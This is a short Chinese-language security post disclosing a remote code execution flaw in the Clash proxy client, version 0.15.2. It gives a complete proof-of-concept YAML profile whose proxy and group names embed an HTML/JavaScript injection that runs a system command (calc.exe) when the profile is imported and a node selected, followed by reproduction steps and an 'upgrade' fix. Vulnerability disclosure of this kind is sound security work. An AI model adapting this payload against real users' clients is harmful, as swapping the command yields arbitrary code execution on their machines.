前言
本文内容仅为技术科普,请勿用于非法用途!
仅展示漏洞,不存在翻墙
一、clash存在漏洞版本
目前发现的漏洞版本是0.15.2。
二、POC利用
新建yaml文件如下:
port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
- name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: socks5
server: 127.0.0.1
port: "17938"
skip-cert-verify: true
- name: abc
type: socks5
server: 127.0.0.1
port: "8088"
skip-cert-verify: true
proxy-groups:
-
name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: select
proxies:
- a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
三、复现教程
1.打开clash,进入Profiles,点击import导入刚刚新建的poc.yaml文件。
2.点击切换到导入的yaml文件上。
3.切换节点时会弹出计算器,说明远程代码执行成功了
四、修复建议
升级版本!!!
更多安全分享,请关注【安全info】微信公众号!